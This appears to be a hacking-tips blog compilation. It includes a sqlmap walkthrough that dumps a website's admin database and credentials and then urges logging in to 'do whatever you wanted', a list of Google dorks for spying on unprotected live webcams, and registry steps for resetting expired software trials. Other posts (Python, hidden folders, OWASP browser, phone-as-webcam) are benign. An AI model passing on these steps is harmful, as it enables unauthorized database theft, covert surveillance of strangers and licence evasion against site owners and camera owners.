HACKING WEBSITE (SQLi) USING SQLMAP

Today I will introduce you a very simple tool which will ease your SQL injection procedure. With the help of this tool even a noob can also hack a website.

About Sqlmap:

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

To use this you need to download and install python. 

Installing and setting path for python:-

Step 1: Download python from www.python.org 

              (Download Python 2.7)

Step 2: Unzip that and install that in your computer.

Step 3: Go to control panel --> Go to System --> Click on Edit the system Environment variable.

Step 4: Then follow the steps given in the pic. Edit the environment variable as C:\python27;

Step 5: Click Ok and Restart your laptop.

Sqlmap:

Step 6: Download sqlmap from www.sqlmap.org.

Step 7: Unzip that and save that in your desired folder. (like I have saved that in C:)

Step 8: Open cmd by pressing windows + R. And then typing cmd and hit enter.

Step 9: Go to the folder where sqlmap is stored. 

C:> cd sqlmap 

Step 9: Run sqlmap and use it. Find a vulnerable url (how to find will discuss in other post, let here vulnerable url be www.vulnesite.php?id=23)

C:/sqlmap> python sqlmap.py -u www.vulnesite.php?id=23

Step 9: Then find the database of the website.

C:/sqlmap> python sqlmap.py -u "www.vulnesite.php?id=23" --dbs 

Step 10: Then find the tables and then column. (Let database found be admin)

C:/sqlmap> python sqlmap.py -u "www.vulnesite.php?id=23" --tables -D admin

(tables found be admin)

C:/sqlmap> python sqlmap.py -u "www.vulnesite.php?id=23" --columns -D admin -T user

Step 11: Get all the data from the tables.

C:/sqlmap> python sqlmap.py -u "www.vulnesite.php?id=23" --dump -D admin -T user

Step 12: You get the username and password. Now you can find the admin login page and type the username and the password (if its in MD5 hash then you need to decode that from various website). Now login and do whatever you wanted to do.

Author:Unpredictable

For any query feel free to contact us @ prashantsavior@gmail.com and don't forget to like us on Facebook.

Learn Python

Python is a widely used general-purpose, high-level programming language. Its design philosophy emphasizes codereadability, and its syntax allows programmers to express concepts in fewer lines of code than would be possible in languages such as C. The language provides constructs intended to enable clear programs on both a small and large scale.

Python supports multiple programming paradigms, including object-oriented, imperative and functional programming or proceduralstyles. It features a dynamic type system and automatic memory management and has a large and comprehensive standard library.

Like other dynamic languages, Python is often used as a scripting language, but is also used in a wide range of non-scripting contexts. Using third-party tools, such as Py2exe, or Pyinstaller, Python code can be packaged into standalone executable programs. Python interpreters are available for many operating systems.

CPython, the reference implementation of Python, is free and open source software and has a community-based development model, as do nearly all of its alternative implementations. CPython is managed by the non-profit Python Software Foundation.

Click on the link below to download a bunch of books.

Download

For more details please free to contact us @ prashantsavior@gmail.com

HOW TO MAKE NAMELESS FOLDER

Have you ever tried of making a nameless folder??? I guess if you ever tried with by just deleting the default folder name and hitting enter then again the default name comes. The same happens if you ever tried to make a folder named 'con', etc... Because there are certain keywords which has been assigned by the windows and is only for its internal use. Now the question comes how can we make nameless folder or folder named like con...

So for that simply follow the given steps...

Step 1: Make a folder in the drive where you want to make.

Step 2: Right click on the folder and then click on rename.

Step 3: Clear the default name by pressing backspace key.

Step 4: Switch on your Number lock (by pressing Fn + scroll ).

Step 5: Then keep on pressing alt with one finger and from other press k,i,i simultaneously (better say alt + 255 as k=2, i=5, when number lock is switched on).

Step 6: Then release all the keys and finally press Enter. Your nameless folder has been created.

alt + 255 actually prints a non-printable character which is not seen. Even if you try to press spacebar and then press enter, it won't work. I hope all of you have did this successfully.
Similarly, to make a folder named with con --> simply type con and then follow step 5 and 6.

Author: Unpredictable

If you have any query regarding this, feel free to contact us @ prashantsavior@gmail.com or simply comment on the below.

Hacker's Browser

                                                        OWASP MANTRA JANUS

OWASP, the different type of community which develops free application which can be trusted and used by all. They develop open source software for cyber security.
This time they came up with a browser which has all the capability and add on pre-installed which is required by every pentester and security geeks, it won't be odd to say that this browser is best for the hacker's as well as for cracker's.

You can download OWASP Mantra Janus from the link below

Click here to Download

Or

If you want to download it from the official site then go to the link below

Click here to proceed


About OWASP:
It was established as a not-for-profit charitable organization in the United States on April 21, 2004 to ensure the ongoing availability and support for our work at OWASP. OWASP is an international organization and the OWASP Foundation supports OWASP efforts around the world. OWASP is an open community dedicated to enabling organizations to conceive, develop, acquire, operate, and maintain applications that can be trusted. All of the OWASP tools, documents, forums, and chapters are free and open to anyone interested in improving application security. They advocate approaching application security as a people, process, and technology problem because the most effective approaches to application security include improvements in all of these areas.
OWASP is a new kind of organization. Our freedom from commercial pressures allows us to provide unbiased, practical, cost-effective information about application security. OWASP is not affiliated with any technology company, although we support the informed use of commercial security technology. Similar to many open-source software projects, OWASP produces many types of materials in a collaborative, open way. The OWASP Foundation is a not-for-profit entity that ensures the project's long-term success.

For more visit www.owasp.org

LOCK YOUR PRIVATE FILES WITH PASSWORD WITHOUT ANY SOFTWARE

Everyone seeks for some private software so that they can safely hide their files from unauthorized users. And for that they download many software for the purpose. Those software charges after the trial period is over. So why not you make a simple software by writing a simple program which can hide your private things at least with the noobs. So here is a simple batch programming with which you can keep your file safely.

Step 1: Go to control panel --> click on folder option --> click on view --> Click on 'Don't show hidden files, folders and drives' -->  click on apply --> click on OK.

Step 2: Create a notepad file in which drive you want to keep your secret file and paste the following code in the notepad.

cls

@ECHO OFF

title Folder Private

if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK

if NOT EXIST Private goto MDLOCKER

:CONFIRM

echo Are you sure you want to lock the folder(Y/N)

set/p "cho=>"

if %cho%==Y goto LOCK

if %cho%==y goto LOCK

if %cho%==n goto END

if %cho%==N goto END

echo Invalid choice.

goto CONFIRM

:LOCK

ren Private "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"

attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"

echo Folder locked

goto End

:UNLOCK

echo Enter password to unlock folder

set/p "pass=>"

if NOT %pass%== PASSWORD_GOES_HERE goto FAIL

attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"

ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Private

echo Folder Unlocked successfully

goto End

:FAIL

echo Invalid password

goto end

:MDLOCKER

md Private

echo Private created successfully

goto End

:End

Step 3: Delete PASSWORD_GOES_HERE and write the password you want to set.

Step 4: Save the file as hide and extension as .bat and then close it.

Step 5: Click on the batch file created. A folder name Private will be created. Copy and paste all your important files in that folder and then close that folder. 

Step 6: Again click on the hide.bat then enter your choice as 'y'. Your folder will get hide.

Step 7: To unlock again click on the hide.bat and enter your password. You will get all your content back.

If you have any problem then feel free to contact us @ prashantsavior@gmail.com or you can also comment on the comment box given below. And if you liked the post then don't forget to give a like, it encourages us.

Author: Unpredictable 

Access Unprotected Webcam (Webcam Hack)

Note: This is for educational purpose. We are not responsible if you do anything illegal with this.

There are  many unprotected webcams around the world and they have been scanned by Google bots. There are certain keywords in the Google through which you can access those webcams and see what is actually happening there live. These keywords are called Google dorks. All you need to do is to follow the two simple states.

Step 1: Open Google.
Step 2: Copy and paste any of the code. And you will get into very different webcams and spy on that.

inurl:/view.shtml
intitle:”Live View / - AXIS” | inurl:view/view.shtml^
inurl:ViewerFrame?Mode=
inurl:ViewerFrame?Mode=Refresh
inurl:axis-cgi/jpg
inurl:axis-cgi/mjpg (motion-JPEG)
inurl:view/indexFrame.shtml
inurl:view/index.shtml
inurl:view/view.shtml
liveapplet
intitle:”live view” intitle:axis
intitle:liveapplet
allintitle:”Network Camera NetworkCamera”
intitle:axis intitle:”video server”
intitle:liveapplet inurl:LvAppl
intitle:”EvoCam” inurl:”webcam.html”
intitle:”Live NetSnap Cam-Server feed”
intitle:”Live View / - AXIS”
intitle:”Live View / - AXIS 206M”
intitle:”Live View / - AXIS 206W”
intitle:”Live View / - AXIS 210″
inurl:indexFrame.shtml Axis
inurl:”MultiCameraFrame?Mode=Motion”
intitle:start inurl:cgistart
intitle:”WJ-NT104 Main Page”
intext:”MOBOTIX M1″ intext:”Open Menu”
intext:”MOBOTIX M10″ intext:”Open Menu”
intext:”MOBOTIX D10″ intext:”Open Menu”
intitle:snc-z20 inurl:home/
intitle:snc-cs3 inurl:home/
intitle:snc-rz30 inurl:home/
intitle:”sony network camera snc-p1″
intitle:”sony network camera snc-m1″
site:.viewnetcam.com -www.viewnetcam.com
intitle:”Toshiba Network Camera” user login
intitle:”netcam live image”
intitle:”i-Catcher Console - Web Monitor”


Example: open a new tab --> type google.com --> copy and paste inurl:/view.shtm --> click on the search result that appers.
You can do these with other dorks too. 

Author: Unpredictable
If you have any query then feel free to contact us @ prashantsavior@gmail.com.

Turn your Cell Phone as Webcam

Before start reading the post make sure you have few things and then read further..

Read it if you have 1. Computer 2. Android Phone. If you have these two things then read further.

Today many apps are being made so that they can establish a link between computer and android phone. There are many applications which let your computer do such things which are done with mobile in a handy way.

We will be introducing today as how to make your cell phone's camera into a webcam and use that with your computer. If you Google it, you will come across many apps but here is one of the most simple way to do this. 

First download few things

1. IP webcam (Download and install this in your Android Phone)

2. IP camera adapter (Download and install this in your computer)

3. Firefox or Chrome (Optional, if you wish you can download either of this browser on your android phone)

Now Since we have all these things with us, so lets start.

Step 1: Install IP Webcam application on your android mobile phone and also install the IP Camera Adapter on your PC.

Step 2: Then open the installed IP Camera app on your phone after it you will many options like username, password, screen resolution and many more which you can adjust according to your choice. After doing so just click on the Start Server.

Here the default camera setting is preferred for better quality.

Step 3: Then click on the start server and after that you will see a IP (A no. written as XXX.XXX.XXX.XXX, where nos. are there in place of X) at the bottom of mobile's screen. Now open this IP in your mobile's Chrome or Firefox browser. If you have not installed these browser on your android mobile then select Browser built-in viewer option.

Step 4: Open the installed IP camera adapter on your PC. And in the "Camera feed URL" just enter your IP and port which you got from the app you installed on your phone and remember to add /videofeed and then click on Autodetect.

    example on how to enter: Let I got no. as 192.168.1.102:8080. This means that my IP is 127.2.35.250  and port no. is 8080. To enter this in camera adapter I will type as http://192.168.1.102:8080/videofeed

Step 5 : That's it your are done. Open any video conferencing application or site on your PC like Skype, Facebook, Google+ and you will see the video streaming on your PC from your android mobile phone.

Hope you enjoyed it a lot!!!

Author: Unpredictable

If you have any problem then you can comment below or write to us @ prashantsavior@gmail.com. Don't forget to rate it.

Reuse the software after the trial period is over

This is a common question from a common man... How can I reuse the software whose trial period has been elapsed?
For this you need to follow these simple steps but beware any mistake can leads to several problems in your laptop. So do this with care and if you are not sure then don't do this.

Step 1: Uninstall the software and follow the steps.
Step 2: After uninstalling software, OpenRUN (Windows key + R) and type regedit and hit Enter.
Step 3: Then Registry Editor Window will appear and here navigate to HKEY_LOCAL_MACHINE \ SOFTWARE \ Your Software name from left pane of this window. If you find any Key name with your software name then simply delete that Key.
Step 4: Similarly navigate to HKEY_CURRENT_USER \ Software \ Your Software name and if you find any key with your software name then just delete it and close the Registry Editor window.
Step 5: Again go to RUN and type %temp% and hit Enter.
Step 6: Now Delete all the things in that temporary folder. Don't panic as these are the temporary files and are not necessary for your operating system.
Step 7: Now go to C:\Users\your username here\AppData. Under AppData open all three folders"Local", "Local Low" and "Roaming”and check. Under these three folders if you find any folder or anything with your Software's name, just delete it.
Step 8: Now Restart your PC and install the expired software and you can use it again for trial period.